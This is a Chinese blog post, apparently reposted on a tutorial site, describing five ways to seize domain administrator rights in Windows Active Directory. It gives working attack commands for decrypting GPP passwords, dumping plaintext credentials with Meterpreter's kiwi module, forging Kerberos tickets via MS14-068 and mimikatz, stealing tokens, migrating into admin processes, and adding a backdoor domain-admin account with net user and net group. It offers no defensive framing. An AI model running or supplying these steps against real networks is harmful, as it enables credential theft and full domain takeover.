Python安全获取域管理员权限几种方式操作示例
作者:Bypass-- 时间:2022-10-04 01:14:15
在大多数情况下,攻击者可以通过定位域管理员所登录的服务器,利用漏洞获取服务器system权限,找到域管理的账号、进程或是身份验证令牌,从而获取域管理员权限
第1种方式:利用GPP漏洞获取域管理权限
SYSVOL是域内的共享文件夹,用来存放登录脚本、组策略脚本等信息。当域管理员通过组策略修改密码时,在脚本中引入用户密码,就可能导致安全问题。
(1)访问SYSVOL共享文件夹,搜索包含“cpassword”的XML文件,获取AES加密的密码。
(2)使用kali自带的gpp-decrypt进行破解,从而获取域账号密码,直接登录域管理员账号获取访问权限。
第2种方式:获取服务器明文登录密码
使用kiwi模块需要system权限,所以我们在使用该模块之前需要将当前MSF中的shell提升为system。提到system有两个方法,一是当前的权限是administrator用户,二是利用其它手段先提权到administrator用户。然后administrator用户可以直接getsystem到system权限。
meterpreter > getuid
Server username: BYPASS-E97BA3FC\Administrator
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
加载kiwi模块
load kiwi
列举系统中的明文密码
creds_all
第3种方式:使用MS14-068漏洞进行提权
MS14068是一个能够使普通用户提权到域控权限的权限提升漏洞。攻击者可以通过构造特定的请求包来达到提升权限的目的。
攻击流程:
第一步:利用MS14-068伪造生成TGT
MS14-068.exe -u bypass@test.com -p abc123! -s S-1-5-21-735015318-3972860336-672499796 -d dc.test.com
第二步:利用mimikatz将工具得到的TGT票据写入内存,创建缓存证书
mimikatz#kerberos::ptc TGT_bypass@test.com.ccache
第三步:获取域管理员权限。创建一个 test 账号并加入域管理员组,从而随时可以登录域控主机进行操作。
PsExec.exe \\dc cmd.exe
// 添加test用户
net user test abc123! /add /domain
// 把 test 用户添加进域管理员组
net group "domain admins" test /add /domain
// 查看域管理员
net group "domain admins" /domain
第4种方式:窃取域管理员令牌
当有域控账户登陆至服务器时可使用令牌模拟进行渗透取得域控权限。
1、入侵域管理员所在的服务器,窃取域管理员的令牌,从而控制整个域。
2、直接在meterpreter shell上执行添加域管理员
add_user test abc123! -h 域控的IP地址
add_group_user "Domain Admins" test -h 域控IP地址
第5种方式:进程迁移
入侵了域管理员所登录的服务器,将进程迁移到域管理员所运行的进程,就可以获得域管理员权限。
1、获取域管理员列表
net group "Domain Admins" /domain
2、利用ps找到域管理员(TEST\bypass)所运行的进程,然后将shell进程迁移到域管理员所运行的进程中,成功后就获得了域管理员权限。如下图所示:
3、输入shell命令获取OS shell,在本机上使用Windows命令添加新的域管理员:
// 添加test用户
net user test admin@123 /add /domain
// 把 test 用户添加进域管理员组
net group "domain admins" test /add /domain
4、成功添加了域管理员账号test。
来源:https://blog.csdn.net/qq_23936389/article/details/120714817
![](/images/zang.png)
![](/images/jiucuo.png)
猜你喜欢
Pygame的程序开始示例代码
![](https://img.aspxhome.com/file/2023/8/99538_0s.png)
ubuntu下mysql版本升级到5.7
Python实现控制手机电脑拍照并自动发送邮箱
![](https://img.aspxhome.com/file/2023/3/72133_0s.png)
如何将python代码生成API接口
![](https://img.aspxhome.com/file/2023/0/90660_0s.png)
mysql 5.7.13 安装配置方法图文教程(win10)
![](https://img.aspxhome.com/file/2023/6/105496_0s.jpg)
MySQL为何不建议使用默认值为null列
mysql中的跨库关联查询方法
![](https://img.aspxhome.com/file/2023/2/114952_0s.jpg)
30万条数据,搜索文本字段的各种方式对比
根据表名和索引获取需要的列名的存储过程
监测站点使用多少session和application的asp程序
python 3.7.0 下pillow安装方法
![](https://img.aspxhome.com/file/2023/6/80426_0s.png)
tkinter禁用(只读)下拉列表Combobox问题
![](https://img.aspxhome.com/file/2023/3/76903_0s.png)
Jmail发信的实例,模块化随时调用
FCKEidtor 自动统计输入字符个数(IE)
![](https://img.aspxhome.com/file/2023/0/71290_0s.gif)
Vue生命周期实例分析总结
![](https://img.aspxhome.com/file/2023/0/123010_0s.png)
关于Python 3中print函数的换行详解
![](https://img.aspxhome.com/file/2023/5/98325_0s.jpg)
python 实现的发送邮件模板【普通邮件、带附件、带图片邮件】
实例讲解启动mysql server失败的解决方法
Python3读取文件常用方法实例分析
Python文字截图识别OCR工具实例解析
![](https://img.aspxhome.com/file/2023/0/63920_0s.png)